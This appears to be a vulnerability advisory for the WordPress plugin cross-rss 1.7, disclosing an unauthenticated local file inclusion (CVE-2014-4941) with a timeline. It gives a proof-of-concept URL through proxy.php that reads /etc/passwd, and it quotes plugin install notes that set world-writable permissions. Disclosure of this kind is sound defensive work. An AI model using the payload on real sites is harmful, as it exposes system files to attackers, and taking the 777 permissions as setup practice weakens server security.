wp-plugin : cross-rss

Plugin Details
Plugin Name: wp-plugin : cross-rss
Effected Version : 1.7 (and most probably lower version's if any)
Vulnerability : Local File Inclusion
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd

Vulnerable Parameter : rss


Disclosure Timeline
Vendor Contacted : 2014-02-19
Plugin Status : Updated on
Public Disclosure : May 29, 2014
CVE Number : CVE-2014-4941
Plugin Description :
[| IP file, place folder cross-rss with all files to wp-content/plugins dir. Go to WordPress Admin Plugins sections and activate Cross-RSS 0.5 plugin Set chmod 777 to wp-content/plugins/cross-rss/cache (make writable by webserver scripts) Set chmod 666 to wp-content/plugins/cross-rss/proxy.log (make writable by webserver scripts) Usage When create page or blog just place line: [crossrss url=http://example.com/file.rss /] Where http://example.com/file.rss is a full URL to RSS you want to view on your WordPress page ]